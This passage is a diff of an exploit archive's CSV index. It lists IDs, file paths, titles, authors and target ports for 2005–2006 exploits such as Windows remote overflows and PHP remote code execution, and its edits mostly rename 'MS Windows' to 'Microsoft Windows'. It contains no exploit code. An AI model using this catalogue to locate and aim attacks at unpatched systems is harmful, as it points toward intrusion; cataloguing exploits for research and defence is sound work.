(MS05-039)",2005-08-11,sl0ppy,windows,remote,139 1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec Remote File Access Exploit (windows)",2005-08-11,N/A,windows,remote,10000 -1149,platforms/windows/remote/1149.c,"MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445 +1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445 1150,platforms/windows/remote/1150.pm,"ZENworks 6.5 Desktop/Server Management Remote Stack Overflow",2005-08-12,N/A,windows,remote,1761 1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow Exploit",2005-08-12,N/A,windows,remote,143 1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 iMonitor Remote Stack Overflow",2005-08-12,N/A,windows,remote,8008 @@ -975,9 +975,9 @@ id,file,description,date,author,platform,type,port 1174,platforms/windows/local/1174.c,"ZipTorrent <= 1.3.7.3 - Local Proxy Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0 1175,platforms/cgi/webapps/1175.pl,"GTChat <= 0.95 Alpha (adduser) Remote Denial of Service Exploit",2005-08-23,VTECin5th,cgi,webapps,0 1176,platforms/multiple/dos/1176.c,"Ventrilo <= 2.3.0 - Remote Denial of Service Exploit (all platforms)",2005-08-23,"Luigi Auriemma",multiple,dos,0 -1178,platforms/windows/remote/1178.c,"MS Windows IIS 5.0 (500-100.asp) Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0 -1179,platforms/windows/remote/1179.c,"MS Windows Plug-and-Play Service Remote Universal Exploit (spanish fix)",2005-08-25,RoMaNSoFt,windows,remote,445 -1180,platforms/windows/remote/1180.c,"MS Windows Plug-and-Play Service Remote Universal Exploit (french fix)",2005-08-25,"Fabrice Mourron",windows,remote,445 +1178,platforms/windows/remote/1178.c,"Microsoft Windows IIS 5.0 - (500-100.asp) Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0 +1179,platforms/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (spanish fix)",2005-08-25,RoMaNSoFt,windows,remote,445 +1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (French Fix)",2005-08-25,"Fabrice Mourron",windows,remote,445 1181,platforms/linux/local/1181.c,"MySQL 4.0.17 UDF Dynamic Library Exploit",2004-12-24,"Marco Ivaldi",linux,local,0 1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 (ld.so.1) Local Root Exploit (sparc)",2004-12-24,"Marco Ivaldi",solaris,local,0 1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) Login Bypass/Pass Stealer/DoS Exploit",2005-08-29,"Luigi Auriemma",windows,remote,0 @@ -993,8 +993,8 @@ id,file,description,date,author,platform,type,port 1193,platforms/windows/remote/1193.pl,"Free SMTP Server <= 2.2 Spam Filter Vulnerability",2005-09-02,basher13,windows,remote,0 1194,platforms/cgi/webapps/1194.c,"man2web <= 0.88 Multiple Remote Command Execution Exploit (update2)",2005-09-04,tracewar,cgi,webapps,0 1196,platforms/linux/dos/1196.c,"CUPS Server <= 1.1 (Get Request) Denial of Service Exploit",2005-09-05,tracewar,linux,dos,0 -1197,platforms/windows/local/1197.c,"MS Windows (keybd_event) Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0 -1198,platforms/windows/local/1198.c,"MS Windows CSRSS Local Privilege Escalation Exploit (MS05-018)",2005-09-06,eyas,windows,local,0 +1197,platforms/windows/local/1197.c,"Microsoft Windows - (keybd_event) Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0 +1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Local Privilege Escalation Exploit (MS05-018)",2005-09-06,eyas,windows,local,0 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker <= 7.7r3 Denial of Service Exploit",2005-09-06,Sowhat,windows,dos,0 1200,platforms/php/webapps/1200.php,"PBLang <= 4.65 Remote Command Execution Exploit",2005-09-07,rgod,php,webapps,0 1201,platforms/windows/remote/1201.pl,"FTP Internet Access Manager <= 1.2 Command Execution Exploit",2005-09-07,basher13,windows,remote,0 @@ -1050,7 +1050,7 @@ id,file,description,date,author,platform,type,port 1257,platforms/multiple/dos/1257.html,"Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit",2005-10-17,Kubbo,multiple,dos,0 1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) Remote SQL Injection Exploit",2005-10-18,rgod,linux,remote,0 1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server Preauthentication Directory Listing Exploit (meta)",2005-10-19,Optyx,hp-ux,remote,0 -1260,platforms/windows/remote/1260.pm,"MS Windows IIS SA WebAgent 5.2/5.3 Redirect Overflow Exploit (meta)",2005-10-19,"H D Moore",windows,remote,80 +1260,platforms/windows/remote/1260.pm,"Microsoft Windows IIS - SA WebAgent 5.2/5.3 Redirect Overflow Exploit (meta)",2005-10-19,"H D Moore",windows,remote,80 1261,platforms/hp-ux/remote/1261.pm,"HP-UX <= 11.11 lpd Remote Command Execution Exploit (meta)",2005-10-19,"H D Moore",hp-ux,remote,515 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 CAM log_security() Stack Overflow Exploit (meta)",2005-10-19,"H D Moore",windows,remote,4105 1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (linux)",2005-10-20,"Kevin Finisterre",multiple,remote,13722 @@ -1059,9 +1059,9 @@ id,file,description,date,author,platform,type,port 1266,platforms/windows/dos/1266.py,"Ethereal 0.9.1 - 0.10.12 SLIMP3 Remote Buffer Overflow PoC",2005-10-20,Sowhat,windows,dos,0 1267,platforms/linux/local/1267.c,"XMail 1.21 (-t Command Line Option) Local Root Buffer Overflow Exploit",2005-10-20,qaaz,linux,local,0 1268,platforms/multiple/dos/1268.pl,"Net Portal Dynamic System <= 5.0 (register users) Denial of Service",2005-10-21,DarkFig,multiple,dos,0 -1269,platforms/windows/dos/1269.c,"MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047)",2005-10-21,N/A,windows,dos,0 +1269,platforms/windows/dos/1269.c,"Microsoft Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047)",2005-10-21,N/A,windows,dos,0 1270,platforms/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution Exploit",2005-10-23,rgod,php,webapps,0 -1271,platforms/windows/dos/1271.c,"MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) (2)",2005-10-24,"Winny Thomas",windows,dos,0 +1271,platforms/windows/dos/1271.c,"Microsoft Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) (2)",2005-10-24,"Winny Thomas",windows,dos,0 1272,platforms/linux/remote/1272.c,"Snort <= 2.4.2 Back Orifice Parsing Remote Buffer Overflow Exploit",2005-10-25,rd,linux,remote,0 1273,platforms/php/webapps/1273.pl,"TClanPortal <= 1.1.3 (id) Remote SQL Injection Exploit",2005-10-26,Devil-00,php,webapps,0 1274,platforms/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - HTTP GET Remote DoS",2005-10-27,Expanders,hardware,dos,0 @@ -1104,7 +1104,7 @@ id,file,description,date,author,platform,type,port 1325,platforms/php/webapps/1325.pl,"PHPWebThings <= 1.4 (forum) SQL Injection Exploit",2005-11-16,AhLam,php,webapps,0 1326,platforms/php/webapps/1326.pl,"PHP-Nuke <= 7.8 Search Module Remote SQL Injection Exploit",2005-11-16,N/A,php,webapps,0 1327,platforms/windows/dos/1327.pl,"FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC",2005-11-16,"Luca Ercoli",windows,dos,0 -1328,platforms/windows/dos/1328.c,"MS Windows 2k UPNP (getdevicelist) Memory Leak DoS Exploit",2005-11-16,"Winny Thomas",windows,dos,0 +1328,platforms/windows/dos/1328.c,"Microsoft Windows 2000 - UPNP (getdevicelist) Memory Leak DoS Exploit",2005-11-16,"Winny Thomas",windows,dos,0 1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 (config.php) SQL Injection / Command Execution Exploit",2005-11-17,rgod,php,webapps,0 1330,platforms/windows/remote/1330.c,"FreeFTPD <= 1.0.8 (USER) Remote Buffer Overflow Exploit",2005-11-17,Expanders,windows,remote,21 1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin <= 7.0.19.0 (Action) Denial of Service Exploit",2005-11-18,BassReFLeX,multiple,dos,0 @@ -1115,11 +1115,11 @@ id,file,description,date,author,platform,type,port 1338,platforms/hardware/dos/1338.pl,"Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit",2005-11-23,"Janis Vizulis",hardware,dos,0 1339,platforms/windows/dos/1339.c,"FreeFTPD <= 1.0.10 (PORT Command) Denial of Service Exploit",2005-11-24,"Stefan Lochbihler",windows,dos,0 1340,platforms/php/webapps/1340.php,"eFiction <= 2.0 Fake GIF Shell Upload Exploit",2005-11-25,rgod,php,webapps,0 -1341,platforms/windows/dos/1341.c,"MS Windows MSDTC Service Remote Memory Modification PoC (MS05-051)",2005-11-27,darkeagle,windows,dos,0 +1341,platforms/windows/dos/1341.c,"Microsoft Windows MSDTC Service Remote Memory Modification PoC (MS05-051)",2005-11-27,darkeagle,windows,dos,0 1342,platforms/php/webapps/1342.php,"Guppy <= 4.5.9 (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0 -1343,platforms/windows/dos/1343.c,"MS Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0 +1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0 1345,platforms/php/webapps/1345.php,"Xaraya <= 1.0.0 RC4 create() Denial of Service Exploit",2005-11-29,rgod,php,webapps,0 -1346,platforms/windows/dos/1346.c,"MS Windows Metafile (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 +1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0 1352,platforms/windows/remote/1352.cpp,"Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated)",2005-12-01,Swan,windows,remote,0 1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple PreAuth Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0 @@ -1145,8 +1145,8 @@ id,file,description,date,author,platform,type,port 1373,platforms/php/webapps/1373.php,"Limbo <= 1.0.4.2 _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0 1374,platforms/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x Remote Code Execution Exploit PoC",2005-12-15,"Mariano Nuñez",windows,remote,0 1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)",2005-12-16,kingcope,windows,remote,105 -1376,platforms/windows/dos/1376.c,"MS Windows IIS Malformed HTTP Request Denial of Service Exploit (c)",2005-12-19,Kozan,windows,dos,0 -1377,platforms/windows/dos/1377.pl,"MS Windows IIS Malformed HTTP Request Denial of Service Exploit (pl)",2005-12-19,kokanin,windows,dos,0 +1376,platforms/windows/dos/1376.c,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (c)",2005-12-19,Kozan,windows,dos,0 +1377,platforms/windows/dos/1377.pl,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (pl)",2005-12-19,kokanin,windows,dos,0 1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0 1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143 @@ -1161,7 +1161,7 @@ id,file,description,date,author,platform,type,port 1391,platforms/windows/remote/1391.pm,"Windows XP/2003 Metafile Escape() Code Execution Exploit (meta)",2005-12-27,"H D Moore",windows,remote,0 1394,platforms/windows/dos/1394.html,"MS Internet Explorer 6.0 (mshtml.dll div) Denial of Service Exploit",2005-12-29,rgod,windows,dos,0 1395,platforms/php/webapps/1395.php,"phpDocumentor <= 1.3.0 rc4 Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0 -1396,platforms/windows/dos/1396.cpp,"MS Windows IIS Malformed HTTP Request Denial of Service Exploit (cpp)",2005-12-29,Lympex,windows,dos,0 +1396,platforms/windows/dos/1396.cpp,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (cpp)",2005-12-29,Lympex,windows,dos,0 1397,platforms/linux/local/1397.c,"Linux Kernel <= 2.6.11 - (CPL 0) Local Root Exploit (k-rad3.c)",2005-12-30,alert7,linux,local,0 1398,platforms/php/webapps/1398.pl,"CubeCart <= 3.0.6 - Remote Command Execution Exploit",2005-12-30,cijfer,php,webapps,0 1399,platforms/asp/webapps/1399.txt,"WebWiz Products 1.0 / <= 3.06 - Login Bypass SQL Injection Exploits",2005-12-30,DevilBox,asp,webapps,0 @@ -1172,7 +1172,7 @@ id,file,description,date,author,platform,type,port 1404,platforms/windows/local/1404.c,"WinRAR 3.30 Long Filename Buffer Overflow Exploit (more targets) (2)",2006-01-04,c0d3r,windows,local,0 1405,platforms/php/webapps/1405.pl,"FlatCMS <= 1.01 (file_editor.php) Remote Command Execution Exploit",2006-01-04,cijfer,php,webapps,0 1406,platforms/windows/local/1406.php,"PHP <= 4.4.0 (mysql_connect function) Local Buffer Overflow Exploit",2006-01-05,mercenary,windows,local,0 -1407,platforms/windows/local/1407.c,"MS Windows 2k Kernel APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0 +1407,platforms/windows/local/1407.c,"Microsoft Windows 2000 - Kernel APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0 1408,platforms/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit",2006-01-07,FistFuXXer,windows,remote,80 1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy <= 6.0 R1c (GET Request) Denial of Service Exploit",2006-01-07,FistFuXXer,windows,dos,0 1410,platforms/php/webapps/1410.pl,"Magic News Plus <= 1.0.3 Admin Pass Change Exploit",2006-01-09,cijfer,php,webapps,0 @@ -1185,7 +1185,7 @@ id,file,description,date,author,platform,type,port 1417,platforms/windows/remote/1417.pl,"Farmers WIFE 4.4 sp1 (FTP) Remote System Access Exploit",2006-01-14,kokanin,windows,remote,22003 1418,platforms/asp/webapps/1418.txt,"MiniNuke <= 1.8.2 - Multiple SQL Injection Vulnerabilities",2006-01-14,nukedx,asp,webapps,0 1419,platforms/asp/webapps/1419.pl,"MiniNuke <= 1.8.2 (news.asp hid) SQL Injection Exploit",2006-01-14,DetMyl,asp,webapps,0 -1420,platforms/windows/remote/1420.c,"MS Windows Metafile (WMF) Remote File Download Exploit Generator",2006-01-15,darkeagle,windows,remote,0 +1420,platforms/windows/remote/1420.c,"Microsoft Windows Metafile (WMF) Remote File Download Exploit Generator",2006-01-15,darkeagle,windows,remote,0 1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 Volume Manager Daemon Remote BoF Exploit",2006-01-16,"Patrick Thomassen",windows,remote,13701 1422,platforms/windows/dos/1422.c,"Cerberus FTP Server <= 2.32 Denial of Service Exploit",2006-01-16,pi3ch,windows,dos,0 1423,platforms/windows/dos/1423.html,"MS Internet Explorer <= 6.x (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0 @@ -1209,7 +1209,7 @@ id,file,description,date,author,platform,type,port 1462,platforms/windows/remote/1462.cpp,"Sami FTP Server 2.0.1 - Remote Buffer Overflow Exploit (cpp)",2006-01-31,HolyGhost,windows,remote,21 1463,platforms/windows/remote/1463.pm,"SoftiaCom WMailserver 1.0 SMTP Remote Buffer Overflow Exploit (meta)",2006-02-01,y0,windows,remote,21 1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 (telnetd) Remote Denial of Service Exploit",2006-02-02,"Fabian Ramirez",hardware,dos,0 -1465,platforms/windows/local/1465.c,"MS Windows Services ACLs Local Privilege Escalation Exploit (updated)",2006-02-12,"Andres Tarasco",windows,local,0 +1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Local Privilege Escalation Exploit (Updated)",2006-02-12,"Andres Tarasco",windows,local,0 1466,platforms/windows/remote/1466.pl,"eXchange POP3 5.0.050203 (rcpt to) Remote Buffer Overflow Exploit",2006-02-03,"securma massine",windows,remote,25 1467,platforms/php/webapps/1467.php,"LoudBlog <= 0.4 (path) Arbitrary Remote Inclusion Exploit",2006-02-03,rgod,php,webapps,0 1468,platforms/php/webapps/1468.php,"Clever Copy <= 3.0 Admin Auth Details / Remote SQL Injection Exploit",2006-02-04,rgod,php,webapps,0 @@ -1245,9 +1245,9 @@ id,file,description,date,author,platform,type,port 1501,platforms/php/webapps/1501.php,"PHPKIT <= 1.6.1R2 (filecheck) Remote Commands Execution Exploit",2006-02-16,rgod,php,webapps,0 1502,platforms/windows/remote/1502.py,"Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2)",2006-02-16,redsand,windows,remote,0 1503,platforms/php/webapps/1503.pl,"YapBB <= 1.2 (cfgIncludeDirectory) Remote Command Execution Exploit",2006-02-16,cijfer,php,webapps,0 -1504,platforms/windows/remote/1504.pm,"MS Windows Media Player 9 Plugin Overflow Exploit (MS06-006) (meta)",2006-02-17,"H D Moore",windows,remote,0 -1505,platforms/windows/remote/1505.html,"MS Windows Media Player 10 Plugin Overflow Exploit (MS06-006)",2006-02-17,"Matthew Murphy",windows,remote,0 -1506,platforms/windows/remote/1506.c,"MS Windows Color Management Module Overflow Exploit (MS05-036) (2)",2006-02-17,darkeagle,windows,remote,0 +1504,platforms/windows/remote/1504.pm,"Microsoft Windows Media Player 9 - Plugin Overflow Exploit (MS06-006) (meta)",2006-02-17,"H D Moore",windows,remote,0 +1505,platforms/windows/remote/1505.html,"Microsoft Windows Media Player 10 - Plugin Overflow Exploit (MS06-006)",2006-02-17,"Matthew Murphy",windows,remote,0 +1506,platforms/windows/remote/1506.c,"Microsoft Windows - Color Management Module Overflow Exploit (MS05-036) (2)",2006-02-17,darkeagle,windows,remote,0 1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 (referer) Remote Command Execution Exploit",2006-02-17,RusH,cgi,webapps,0 1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 (rollid) Remote SQL Injection Exploit",2006-02-17,RusH,php,webapps,0 1510,platforms/php/webapps/1510.pl,"Gravity Board X <= 1.1 (csscontent) Remote Code Execution Exploit",2006-02-17,RusH,php,webapps,0 @@ -1260,7 +1260,7 @@ id,file,description,date,author,platform,type,port 1517,platforms/php/webapps/1517.c,"PunBB <= 2.0.10 (Register Multiple Users) Denial of Service Exploit",2006-02-20,K4P0,php,webapps,0 1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 - User-Defined Function Local Privilege Escalation Exploit",2006-02-20,"Marco Ivaldi",linux,local,0 1519,platforms/osx/remote/1519.pm,"Mac OS X Safari Browser (Safe File) Remote Code Execution Exploit",2006-02-22,"H D Moore",osx,remote,0 -1520,platforms/windows/remote/1520.pl,"MS Windows Media Player Plugin Overflow Exploit (MS06-006)(3)",2006-02-22,"Matthew Murphy",windows,remote,0 +1520,platforms/windows/remote/1520.pl,"Microsoft Windows Media Player - Plugin Overflow Exploit (MS06-006) (3)",2006-02-22,"Matthew Murphy",windows,remote,0 1521,platforms/php/webapps/1521.php,"Noahs Classifieds <= 1.3 (lowerTemplate) Remote Code Execution",2006-02-22,trueend5,php,webapps,0 1522,platforms/php/webapps/1522.php,"NOCC Webmail <= 1.0 (Local Inclusion) Remote Code Execution Exploit",2006-02-23,rgod,php,webapps,0 1523,platforms/php/webapps/1523.cpp,"PHP-Nuke 7.5 - 7.8 (Search) Remote SQL Injection Exploit",2006-02-23,unitedbr,php,webapps,0 @@ -1322,7 +1322,7 @@ id,file,description,date,author,platform,type,port 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog <= 0.4.7.1 - Remote Command Execution Exploit",2006-03-13,rgod,php,webapps,0 1582,platforms/linux/remote/1582.c,"crossfire-server <= 1.9.0 - SetUp() Remote Buffer Overflow Exploit",2006-03-13,landser,linux,remote,13327 1583,platforms/osx/remote/1583.pl,"Apple Mac OS X 10.4.5 Mail.app (Real Name) Buffer Overflow Exploit",2006-03-13,"Kevin Finisterre",osx,remote,25 -1584,platforms/windows/local/1584.cpp,"MS Windows Telephony Service Command Execution Exploit (MS05-040)",2006-03-14,"Cesar Cerrudo",windows,local,0 +1584,platforms/windows/local/1584.cpp,"Microsoft Windows Telephony Service Command Execution Exploit (MS05-040)",2006-03-14,"Cesar Cerrudo",windows,local,0 1585,platforms/php/webapps/1585.php,"php iCalendar <= 2.21 (Cookie) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0 1586,platforms/php/webapps/1586.php,"php iCalendar <= 2.21 (publish.ical.php) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0 1587,platforms/php/webapps/1587.pl,"KnowledgebasePublisher 1.2 (include) Remote Code Execution Exploit",2006-03-15,uid0,php,webapps,0 @@ -1337,11 +1337,11 @@ id,file,description,date,author,platform,type,port 1596,platforms/linux/local/1596.txt,"X.Org X11 (X11R6.9.0/X11R7.0) Local Root Privilege Escalation Exploit",2006-03-20,"H D Moore",linux,local,0 1597,platforms/asp/webapps/1597.pl,"ASPPortal <= 3.1.1 (downloadid) Remote SQL Injection Exploit",2006-03-20,nukedx,asp,webapps,0 1598,platforms/windows/dos/1598.html,"MS Internet Explorer 6.0 (script action handlers) (mshtml.dll) DoS",2006-03-21,"Michal Zalewski",windows,dos,0 -1599,platforms/windows/dos/1599.cpp,"MS Windows XP/2003 (IGMP v3) - Denial of Service Exploit (MS06-007)",2006-03-21,"Alexey Sintsov",windows,dos,0 +1599,platforms/windows/dos/1599.cpp,"Microsoft Windows 2003/XP - (IGMP v3) - Denial of Service Exploit (MS06-007)",2006-03-21,"Alexey Sintsov",windows,dos,0 1600,platforms/php/webapps/1600.php,"FreeWPS <= 2.11 (images.php) Remote Code Execution Exploit",2006-03-21,x128,php,webapps,0 1601,platforms/windows/dos/1601.c,"ASP.NET w3wp (COM Components) Remote Crash Exploit",2006-03-22,"Debasis Mohanty",windows,dos,0 1602,platforms/multiple/remote/1602.c,"BomberClone < 0.11.6.2 - (Error Messages) Remote Buffer Overflow Exploit",2006-03-22,"esca zoo",multiple,remote,11000 -1603,platforms/windows/dos/1603.c,"MS Windows XP/2003 - (IGMP v3) Denial of Service Exploit (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0 +1603,platforms/windows/dos/1603.c,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service Exploit (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0 1604,platforms/windows/dos/1604.html,"MS Internet Explorer 6.0 (mshtml.dll checkbox) Crash",2006-03-22,"Stelian Ene",windows,dos,0 1605,platforms/php/webapps/1605.php,"XHP CMS <= 0.5 (upload) Remote Command Execution Exploit",2006-03-22,rgod,php,webapps,0 1606,platforms/windows/remote/1606.html,"MS Internet Explorer (createTextRang) Remote Code Execution Exploit",2006-03-23,darkeagle,windows,remote,0 @@ -1617,8 +1617,8 @@ id,file,description,date,author,platform,type,port 1907,platforms/php/webapps/1907.txt,"aWebNews <= 1.5 (visview.php) Remote File Include Vulnerability",2006-06-13,SpC-x,php,webapps,0 1908,platforms/php/webapps/1908.txt,"Minerva <= 2.0.8a Build 237 (phpbb_root_path) File Include Vulnerability",2006-06-13,Kacper,php,webapps,0 1909,platforms/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution Exploit",2006-06-13,"Javier Olascoaga",php,webapps,0 -1910,platforms/windows/local/1910.c,"MS Windows (NtClose DeadLock) Vulnerability PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0 -1911,platforms/windows/local/1911.c,"MS Windows XP/2K (Mrxsmb.sys) Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0 +1910,platforms/windows/local/1910.c,"Microsoft Windows - (NtClose DeadLock) Vulnerability PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0 +1911,platforms/windows/local/1911.c,"Microsoft Windows 2000/XP - (Mrxsmb.sys) Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0 1912,platforms/php/webapps/1912.txt,"The Bible Portal Project <= 2.12 (destination) File Include Vulnerability",2006-06-14,Kacper,php,webapps,0 1913,platforms/php/webapps/1913.txt,"Php Blue Dragon CMS <= 2.9.1 (template.php) File Include Vulnerability",2006-06-14,"Federico Fazzi",php,webapps,0 1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) <= 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0 @@ -1647,7 +1647,7 @@ id,file,description,date,author,platform,type,port 1937,platforms/multiple/dos/1937.html,"Opera 9 (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0 1938,platforms/php/webapps/1938.pl,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0 1939,platforms/php/webapps/1939.php,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (php)",2006-06-21,RusH,php,webapps,0 -1940,platforms/windows/remote/1940.pm,"MS Windows RRAS - Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445 +1940,platforms/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445 1941,platforms/php/webapps/1941.php,"Mambo <= 4.6rc1 (Weblinks) Remote Blind SQL Injection Exploit (2)",2006-06-22,rgod,php,webapps,0 1942,platforms/php/webapps/1942.txt,"ralf image gallery <= 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0 1943,platforms/php/webapps/1943.txt,"Harpia CMS <= 1.0.5 - Remote File Include Vulnerabilities",2006-06-22,Kw3[R]Ln,php,webapps,0 @@ -1672,8 +1672,8 @@ id,file,description,date,author,platform,type,port 1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0 1963,platforms/php/webapps/1963.txt,"GeekLog <= 1.4.0sr3 (_CONF[path]) Remote File Include Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0 1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 f(u)ckeditor - Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0 -1965,platforms/windows/remote/1965.pm,"MS Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445 -1967,platforms/windows/dos/1967.c,"MS Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0 +1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445 +1967,platforms/windows/dos/1967.c,"Microsoft Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0 1968,platforms/php/webapps/1968.php,"deV!Lz Clanportal [DZCP] <= 1.34 (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0 1969,platforms/php/webapps/1969.txt,"Stud.IP <= 1.3.0-2 Multiple Remote File Include Vulnerabilities",2006-07-01,"Hamid Ebadi",php,webapps,0 1970,platforms/php/webapps/1970.txt,"Plume CMS 1.1.3 (dbinstall.php) Remote File Include Vulnerability",2006-07-01,"Hamid Ebadi",php,webapps,0 @@ -1752,9 +1752,9 @@ id,file,description,date,author,platform,type,port 2051,platforms/linux/dos/2051.py,"Sendmail <= 8.13.5 - Remote Signal Handling Exploit PoC",2006-07-21,redsand,linux,dos,0 2052,platforms/windows/remote/2052.sh,"MS Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014)",2006-07-21,redsand,windows,remote,0 2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)",2006-07-21,bannedit,multiple,remote,110 -2054,platforms/windows/remote/2054.txt,"MS Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0 +2054,platforms/windows/remote/2054.txt,"Microsoft Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0 2056,platforms/windows/local/2056.c,"Microsoft IIS ASP - Stack Overflow Exploit (MS06-034)",2006-07-21,cocoruder,windows,local,0 -2057,platforms/windows/dos/2057.c,"MS Windows - Mailslot Ring0 Memory Corruption Exploit 